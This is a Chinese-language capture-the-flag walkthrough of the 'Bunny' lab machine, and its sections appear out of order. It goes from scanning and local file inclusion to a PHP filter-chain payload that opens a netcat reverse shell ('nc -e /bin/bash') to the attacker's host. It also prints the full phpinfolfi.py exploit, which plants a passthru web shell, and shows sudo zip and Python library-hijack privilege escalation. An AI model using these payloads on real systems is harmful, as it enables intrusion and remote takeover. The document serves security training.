output")\n\n print "found %s at %i" % (d[i:i+10],i)\n # padded up a bit\n return i+256\n\ndef main():\n\n print "LFI With PHPInfo()"\n print "-=" * 30\n\n if len(sys.argv) < 2:\n print "Usage: %s host [port] [threads]" % sys.argv[0]\n sys.exit(1)\n\n try:\n host = socket.gethostbyname(sys.argv[1])\n except socket.error, e:\n print "Error with hostname %s: %s" % (sys.argv[1], e)\n sys.exit(1)\n\n port=80\n try:\n port = int(sys.argv[2])\n except IndexError:\n pass\n except ValueError, e:\n print "Error with port %d: %s" % (sys.argv[2], e)\n sys.exit(1)\n\n poolsz=10\n try:\n poolsz = int(sys.argv[3])\n except IndexError:\n pass\n except ValueError, e:\n print "Error with poolsz %d: %s" % (sys.argv[3], e)\n sys.exit(1)\n\n print "Getting initial offset...", \n reqphp, tag, reqlfi = setup(host, port)\n offset = getOffset(host, port, reqphp)\n sys.stdout.flush()\n\n maxattempts = 1000\n e = threading.Event()\n l = threading.Lock()\n\n print "Spawning worker pool (%d)..." % poolsz\n sys.stdout.flush()\n\n tp = []\n for i in range(0,poolsz):\n tp.append(ThreadWorker(e,l,maxattempts, host, port, reqphp, offset, reqlfi, tag))\n\n for t in tp:\n t.start()\n try:\n while not e.wait(1):\n if e.is_set():\n break\n with l:\n sys.stdout.write( "\\r% 4d \/ % 4d" % (counter, maxattempts))\n sys.stdout.flush()\n if counter >= maxattempts:\n break\n print\n if e.is_set():\n print "Woot! \\m\/"\n else:\n print ":("\n except KeyboardInterrupt:\n print "\\nTelling threads to shutdown..."\n e.set()\n\n print "Shuttin' down..."\n for t in tp:\n t.join()\n\nif __name__=="__main__":\n main()<\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Bunny]\n\u2514\u2500$ python2 phpinfolfi.py \nLFI With PHPInfo()\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\nUsage: phpinfolfi.py host [port] [threads]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Bunny]\n\u2514\u2500$ python2 phpinfolfi.py 192.168.10.101 80 1000\nLFI With PHPInfo()\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\nGetting initial offset... found [tmp_name] at 137075\nSpawning worker pool (1000)...\n 1000 \/ 1000\n:(\nShuttin' down...\n<\/code><\/pre>\n<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n(remote) www-data@bunny:\/$ sudo -l\nMatching Defaults entries for www-data on bunny:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser www-data may run the following commands on bunny:\n (chris) NOPASSWD: \/bin\/bash \/home\/chris\/lab\/magic *\n\n(remote) www-data@bunny:\/$ cat \/home\/chris\/lab\/magic\n#\/bin\/bash\n$1 $2 $3 -T -TT 'sh #'<\/code><\/pre>\nzip\u63d0\u6743chris<\/h3>\n
\u770b\u4e0a\u53bb\u50cf\u662f\u4f9d\u6b21\u4f20\u9012\u53c2\u6570\uff0c\u6700\u540e\u5206\u914d\u4f2a\u7ec8\u7aef\uff1f\u641c\u4e00\u4e0b\u76f8\u5173\u7684\u8d44\u6599\uff0c\u770b\u770b\u6709\u6ca1\u6709\u89e3\u91ca\uff1a<\/p>\n
\n\u8fd9\u91cc\u7f51\u65ad\u4e86\u4e00\u4e0b\u8def\u7531\u5668\u91cd\u65b0\u5206\u914d\u4e86\u4e00\u4e0bip\uff0c192.168.10.106 -> 192.168.10.102<\/p>\n<\/blockquote>\n
<\/div><\/p>\n\u627e\u5230\u4e86\u4e00\u4e2a\u7528\u6cd5\uff0c\u53c2\u8003 https:\/\/gtfobins.github.io\/gtfobins\/zip\/#sudo<\/a><\/p>\nsudo -u chris \/bin\/bash \/home\/chris\/lab\/magic zip $(mktemp -u) \/etc\/hosts<\/code><\/pre>\n<\/div><\/p>\n\u63d0\u6743<\/h3>\n$ whoami;id\nchris\nuid=1000(chris) gid=1000(chris) groups=1000(chris),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)\n$ bash\nchris@bunny:\/$ cd ~\nchris@bunny:~$ ls -la\ntotal 36\ndrwxr-xr-x 5 chris chris 4096 Jul 31 2021 .\ndrwxr-xr-x 3 root root 4096 Jul 31 2021 ..\nlrwxrwxrwx 1 root root 9 Jul 31 2021 .bash_history -> \/dev\/null\n-rw-r--r-- 1 chris chris 220 Jul 31 2021 .bash_logout\n-rw-r--r-- 1 chris chris 3526 Jul 31 2021 .bashrc\ndrwx------ 3 chris chris 4096 Jul 31 2021 .gnupg\ndrwxr-xr-x 3 chris chris 4096 Jul 31 2021 .local\n-rw-r--r-- 1 chris chris 807 Jul 31 2021 .profile\ndrwxr-xr-x 2 chris chris 4096 Jul 31 2021 lab\n-rwx------ 1 chris chris 33 Jul 31 2021 user.txt\nchris@bunny:~$ cat user.txt \nb9c1575e8d8f934a4101fdbec2f711fe\nchris@bunny:~$ cd lab\/;ls -la\ntotal 12\ndrwxr-xr-x 2 chris chris 4096 Jul 31 2021 .\ndrwxr-xr-x 5 chris chris 4096 Jul 31 2021 ..\n-rw-r--r-- 1 chris chris 34 Jul 31 2021 magic\nchris@bunny:~$ find \/ -user chris -type f 2>\/dev\/null | grep -v proc\n\/home\/chris\/lab\/magic\n\/home\/chris\/.bash_logout\n\/home\/chris\/.bashrc\n\/home\/chris\/user.txt\n\/home\/chris\/.profile\n\/tmp\/zitSwNEH\nchris@bunny:~$ find \/ -group chris -type f 2>\/dev\/null | grep -v proc\n\/home\/chris\/lab\/magic\n\/home\/chris\/.bash_logout\n\/home\/chris\/.bashrc\n\/home\/chris\/user.txt\n\/home\/chris\/.profile\n\/tmp\/zitSwNEH\nchris@bunny:~$ \/usr\/sbin\/getcap -r \/ 2>\/dev\/null\n\/usr\/bin\/ping = cap_net_raw+ep\nchris@bunny:~$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/bin\/umount\n\/usr\/bin\/newgrp\n\/usr\/bin\/su\n\/usr\/bin\/sudo\n\/usr\/bin\/chfn\n\/usr\/bin\/passwd\n\/usr\/bin\/chsh\n\/usr\/bin\/mount\n\/usr\/bin\/gpasswd\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\nchris@bunny:~$ cd \/opt\nchris@bunny:\/opt$ ls -la\ntotal 12\ndrwxr-x--- 2 root chris 4096 Jul 31 2021 .\ndrwxr-xr-x 18 root root 4096 Jul 31 2021 ..\n-rw-r--r-- 1 root root 1993 Jul 31 2021 pendu.py\nchris@bunny:\/opt$ cat pendu.py\nimport random\n# library that we use in order to choose\n# on random words from a list of words\n\nname = input("What is your name? ")\n# Here the user is asked to enter the name first\n\nprint("Good Luck ! ", name)\n\nwords = ['rainbow', 'computer', 'science', 'programming',\n 'python', 'mathematics', 'player', 'condition',\n 'reverse', 'water', 'board', 'geeks']\n\n# Function will choose one random\n# word from this list of words\nword = random.choice(words)\n\nprint("Guess the characters")\n\nguesses = ''\n\n# any number of turns can be used here\nturns = 12\n\nwhile turns > 0:\n\n # counts the number of times a user fails\n failed = 0\n\n # all characters from the input\n # word taking one at a time.\n for char in word:\n\n # comparing that character with\n # the character in guesses\n if char in guesses:\n print(char)\n\n else:\n print("_")\n\n # for every failure 1 will be\n # incremented in failure\n failed += 1\n\n if failed == 0:\n # user will win the game if failure is 0\n # and 'You Win' will be given as output\n print("You Win")\n\n # this print the correct word\n print("The word is: ", word)\n break\n\n # if user has input the wrong alphabet then\n # it will ask user to enter another alphabet\n guess = input("guess a character:")\n\n # every input character will be stored in guesses\n guesses += guess\n\n # check input with the character in word\n if guess not in word:\n\n turns -= 1\n\n # if the character doesn\u2019t match the word\n # then \u201cWrong\u201d will be given as output\n print("Wrong")\n\n # this will print the number of\n # turns left for the user\n print("You have", + turns, 'more guesses')\n\n if turns == 0:\n print("You Loose")\nchris@bunny:\/opt$ find \/ -name random.py -type f 2>\/dev\/null\n\/usr\/lib\/python2.7\/random.py\n\/usr\/lib\/python3.7\/random.py\nchris@bunny:\/opt$ ls -la \/usr\/lib\/python2.7\/random.py\n-rw-r--r-- 1 root root 32457 Jul 31 2021 \/usr\/lib\/python2.7\/random.py\nchris@bunny:\/opt$ ls -la \/usr\/lib\/python3.7\/random.py\n-rw-r--rw- 1 root root 27557 Jul 31 2021 \/usr\/lib\/python3.7\/random.py<\/code><\/pre>\n\u53d1\u73b0python3\u7684\u8fd9\u4e2a\u662f\u53ef\u5199\u7684\uff0c\u5c1d\u8bd5\u8986\u5199\u4e00\u4e0b\uff0c\u4e0a\u9762\u8fd9\u4e2a\u811a\u672c\u5927\u6982\u7387\u662f\u4e00\u4e2a\u5b9a\u65f6\u4efb\u52a1\uff0c\u5230\u65f6\u95f4\u5c31\u53ef\u4ee5\u6267\u884c\u4e86\uff0c\u5148\u4e0a\u4f20pspy64\u770b\u4e00\u4e0b\uff1a<\/p>\n
<\/div><\/p>\n\u5c1d\u8bd5\u52ab\u6301\u4e00\u4e0brandom.py<\/code>\uff1a<\/p>\n<\/div><\/p>\n\u62ff\u4e0b\uff01<\/p>\n
\u53c2\u8003<\/h2>\n
https:\/\/www.bilibili.com\/video\/BV1km411m7T4\/<\/a><\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Bunny]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\n\ud83d\ude35 https:\/\/admin.tryhackme.com\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.10.101:22\nOpen 192.168.10.101:80\n\nPORT STATE SERVICE REASON VERSION\n22\/tcp open ssh syn-ack OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n| 2048 98:7a:07:5b:ed:f7:76:e3:f5:2e:10:16:ba:61:dd:77 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDoombspKP+O01F6h55sJsPNA3dkpjUECHfaJf7pxuOtpJj9oPxcOxjOq\/sPtsa1R\/1A5bDxnYTdUcj0O7IsW7fduqGlEyO0IP8+ho+jENFOBaJn2Tfx7EtO3qEGY26jpw\/PiIgKql1jlJWda8fjITDcREwkNWtJUYnvGA+X9ZO35IYMmf85HVMQbuRxhpBTR1M7h7lXKOhj0iZ+oxVnp0M6M9EuLzD\/hOAeUWY6eS03NMKPBGD7DKd9w\/flSX5bHaz5SHwwOBNtmvPWCWPIOqH21NdIWAFo23muI4baJXbENJ+8A1RbBn0JHZvJRSwFYomuMBHhtzzRK\/ciAywhKg7\n| 256 bc:f8:11:12:e7:cb:20:c5:6c:87:00:b5:57:43:22:d3 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHW6x3BYJZwj\/aQneGntyj+7MbnMB9So\/Z9uGSkJC+rsHxTelO+A6dAGuNvz3EFdz6LWNyj6N\/JdgUfDc+je+Io=\n| 256 9a:61:00:d8:47:fb:7c:b1:a3:4d:4c:f6:8d:5e:40:59 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILkHqSq+74ki8Nl2f2BUe1oCBsCUuBhUml+GII8R4C4P\n80\/tcp open http syn-ack Apache httpd 2.4.38 ((Debian))\n|_http-title: Site doesn't have a title (text\/html; charset=UTF-8).\n|_http-server-header: Apache\/2.4.38 (Debian)\n| http-methods: \n|_ Supported Methods: GET HEAD POST OPTIONS\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Bunny]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,html,txt -b 301,401,403,404\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/192.168.10.101\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 404,301,401,403\n[+] User Agent: gobuster\/3.6\n[+] Extensions: php,html,txt\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index.php (Status: 200) [Size: 25]\n\/upload.php (Status: 200) [Size: 27305]\n\/password.txt (Status: 200) [Size: 537]\n\/config.php (Status: 200) [Size: 24691]\nProgress: 22068 \/ 882244 (2.50%)[ERROR] Get "http:\/\/192.168.10.101\/dhtml": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\nProgress: 35331 \/ 882244 (4.00%)^C\n[!] Keyboard interrupt detected, terminating.\nProgress: 35511 \/ 882244 (4.03%)\n===============================================================\nFinished\n===============================================================\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Bunny]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php -b 301,401,403,404 -t 100 -q\n\/index.php (Status: 200) [Size: 25]\n\/upload.php (Status: 200) [Size: 27305]\n\/config.php (Status: 200) [Size: 24691]\n\/phpinfo.php (Status: 200) [Size: 95618]<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\n
<\/div><\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Bunny]\n\u2514\u2500$ curl -s http:\/\/$IP | html2text\n[bunny.jpg]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Bunny]\n\u2514\u2500$ whatweb http:\/\/$IP \nhttp:\/\/192.168.10.101 [200 OK] Apache[2.4.38], Country[RESERVED][ZZ], HTTPServer[Debian Linux][Apache\/2.4.38 (Debian)], IP[192.168.10.101]<\/code><\/pre>\n\u654f\u611f\u76ee\u5f55<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Bunny]\n\u2514\u2500$ curl -s http:\/\/$IP\/password.txt\n \/| ,\n ,\/\/\/ \/|\n \/\/ \/\/ ,\/\/\/\n \/\/ \/\/ \/\/ \/\/\n \/\/ \/\/ || ||\n || || \/\/ \/\/\n || || \/\/ \/\/\n || || \/\/ \/\/\n || || || ||\n \\\\,\\|,|\\_\/\/\n \\\\)\\)\\\\|\/\n )-."" .-(\n \/\/^\\` `\/^\\\\\n \/\/ | | \\\\\n ,\/_| 0| _ | 0|_\\,\n \/` `"=.v.="` `\\\n \/` _."{_,_}"._ `\\\n `\/` ` \\ ||| \/ ` `\\`\n `",_ \\\\=^~^=\/\/ _,"`\n "=,\\'-=-'\/,="\n '---'\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Bunny]\n\u2514\u2500$ curl -s http:\/\/$IP\/config.php \n0101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101...................\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Bunny]\n\u2514\u2500$ curl -s http:\/\/$IP\/upload.php\n01010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010\n...................<\/code><\/pre>\n<\/div><\/p>\nfuzz<\/h3>\n
\u5c1d\u8bd5fuzz\u4e00\u4e0b\u76f8\u5173\u53c2\u6570\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Bunny]\n\u2514\u2500$ ffuf -c -u 'http:\/\/192.168.10.101\/index.php?FUZZ=\/etc\/passwd' -w \/usr\/share\/wordlists\/dirbuster\/directory-list-lowercase-2.3-medium.txt --fs 25\n\n \/'___\\ \/'___\\ \/'___\\ \n \/\\ \\__\/ \/\\ \\__\/ __ __ \/\\ \\__\/ \n \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\ \n \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/ \n \\ \\_\\ \\ \\_\\ \\ \\____\/ \\ \\_\\ \n \\\/_\/ \\\/_\/ \\\/___\/ \\\/_\/ \n\n v2.1.0-dev\n________________________________________________\n\n :: Method : GET\n :: URL : http:\/\/192.168.10.101\/index.php?FUZZ=\/etc\/passwd\n :: Wordlist : FUZZ: \/usr\/share\/wordlists\/dirbuster\/directory-list-lowercase-2.3-medium.txt\n :: Follow redirects : false\n :: Calibration : false\n :: Timeout : 10\n :: Threads : 40\n :: Matcher : Response status: 200-299,301,302,307,401,403,405,500\n :: Filter : Response size: 25\n________________________________________________\n\npage [Status: 200, Size: 1508, Words: 16, Lines: 32, Duration: 3ms]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Bunny]\n\u2514\u2500$ curl -s http:\/\/$IP\/index.php?page=\/etc\/passwd\n<img src="bunny.jpg">\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:101:102:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-network:x:102:103:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:103:104:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:104:110::\/nonexistent:\/usr\/sbin\/nologin\navahi-autoipd:x:105:112:Avahi autoip daemon,,,:\/var\/lib\/avahi-autoipd:\/usr\/sbin\/nologin\nsshd:x:106:65534::\/run\/sshd:\/usr\/sbin\/nologin\nchris:x:1000:1000:chris,,,:\/home\/chris:\/bin\/bash\nsystemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin<\/code><\/pre>\n\u65b9\u6cd5\u4e00\uff1afilter\u5229\u7528\u94fe<\/h3>\nhttp:\/\/192.168.10.101\/index.php?page=php:\/\/filter\/convert.base64-encode\/resource=..\/..\/..\/..\/..\/etc\/passwd<\/code><\/pre>\n\u53d1\u73b0\u53ef\u4ee5\u6b63\u5e38\u8fdb\u884c LFI\uff0c\u6545\u5c1d\u8bd5\u4e00\u4e0bphp_filter_chain<\/code>\uff1a<\/p>\nhttp:\/\/192.168.10.101\/index.php?page=php:\/\/filter\/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode\/resource=php:\/\/temp&0=nc%20-e%20\/bin\/bash%20192.168.10.106%201234<\/code><\/pre>\n<\/div><\/p>\n\u65b9\u6cd5\u4e8c\uff1aphpinfolfi(\u4f5c\u8005\u89e3\u6cd5)<\/h3>\n
\u5c1d\u8bd5\u67e5\u770b\u4e00\u4e0b\u6709\u65e0\u76f8\u5173\u7684\u6f0f\u6d1e\uff0c\u53c2\u8003 https:\/\/book.hacktricks.xyz\/pentesting-web\/file-inclusion\/lfi2rce-via-phpinfo<\/a><\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Bunny]\n\u2514\u2500$ wget https:\/\/insomniasec.com\/downloads\/publications\/phpinfolfi.py\n--2024-09-04 01:23:58-- https:\/\/insomniasec.com\/downloads\/publications\/phpinfolfi.py\nResolving insomniasec.com (insomniasec.com)... 65.9.141.126, 65.9.141.107, 65.9.141.4, ...\nConnecting to insomniasec.com (insomniasec.com)|65.9.141.126|:443... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 4888 (4.8K) [binary\/octet-stream]\nSaving to: \u2018phpinfolfi.py\u2019\n\nphpinfolfi.py 100%[====================================================================================================>] 4.77K --.-KB\/s in 0.003s \n\n2024-09-04 01:24:01 (1.50 MB\/s) - \u2018phpinfolfi.py\u2019 saved [4888\/4888]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Bunny]\n\u2514\u2500$ cat phpinfolfi.py \n#!\/usr\/bin\/python \nimport sys\nimport threading\nimport socket\n\ndef setup(host, port):\n TAG="Security Test"\n PAYLOAD="""%s\\r\n<?php $c=fopen('\/tmp\/g','w');fwrite($c,'<?php passthru($_GET["f"]);?>');?>\\r""" % TAG\n REQ1_DATA="""-----------------------------7dbff1ded0714\\r\nContent-Disposition: form-data; name="dummyname"; filename="test.txt"\\r\nContent-Type: text\/plain\\r\n\\r\n%s\n-----------------------------7dbff1ded0714--\\r""" % PAYLOAD\n padding="A" * 5000\n REQ1="""POST \/phpinfo.php?a="""+padding+""" HTTP\/1.1\\r\nCookie: PHPSESSID=q249llvfromc1or39t6tvnun42; othercookie="""+padding+"""\\r\nHTTP_ACCEPT: """ + padding + """\\r\nHTTP_USER_AGENT: """+padding+"""\\r\nHTTP_ACCEPT_LANGUAGE: """+padding+"""\\r\nHTTP_PRAGMA: """+padding+"""\\r\nContent-Type: multipart\/form-data; boundary=---------------------------7dbff1ded0714\\r\nContent-Length: %s\\r\nHost: %s\\r\n\\r\n%s""" %(len(REQ1_DATA),host,REQ1_DATA)\n #modify this to suit the LFI script \n LFIREQ="""GET \/lfi.php?load=%s%%00 HTTP\/1.1\\r\nUser-Agent: Mozilla\/4.0\\r\nProxy-Connection: Keep-Alive\\r\nHost: %s\\r\n\\r\n\\r\n"""\n return (REQ1, TAG, LFIREQ)\n\ndef phpInfoLFI(host, port, phpinforeq, offset, lfireq, tag):\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \n\n s.connect((host, port))\n s2.connect((host, port))\n\n s.send(phpinforeq)\n d = ""\n while len(d) < offset:\n d += s.recv(offset)\n try:\n i = d.index("[tmp_name] =>")\n fn = d[i+17:i+31]\n except ValueError:\n return None\n\n s2.send(lfireq % (fn, host))\n d = s2.recv(4096)\n s.close()\n s2.close()\n\n if d.find(tag) != -1:\n return fn\n\ncounter=0\nclass ThreadWorker(threading.Thread):\n def __init__(self, e, l, m, *args):\n threading.Thread.__init__(self)\n self.event = e\n self.lock = l\n self.maxattempts = m\n self.args = args\n\n def run(self):\n global counter\n while not self.event.is_set():\n with self.lock:\n if counter >= self.maxattempts:\n return\n counter+=1\n\n try:\n x = phpInfoLFI(*self.args)\n if self.event.is_set():\n break \n if x:\n print "\\nGot it! Shell created in \/tmp\/g"\n self.event.set()\n\n except socket.error:\n return\n\ndef getOffset(host, port, phpinforeq):\n """Gets offset of tmp_name in the php output"""\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((host,port))\n s.send(phpinforeq)\n\n d = ""\n while True:\n i = s.recv(4096)\n d+=i \n if i == "":\n break\n # detect the final chunk\n if i.endswith("0\\r\\n\\r\\n"):\n break\n s.close()\n i = d.find("[tmp_name] =>")\n if i == -1:\n raise ValueError("No php tmp_name in phpinfo output")\n\n print "found %s at %i" % (d[i:i+10],i)\n # padded up a bit\n return i+256\n\ndef main():\n\n print "LFI With PHPInfo()"\n print "-=" * 30\n\n if len(sys.argv) < 2:\n print "Usage: %s host [port] [threads]" % sys.argv[0]\n sys.exit(1)\n\n try:\n host = 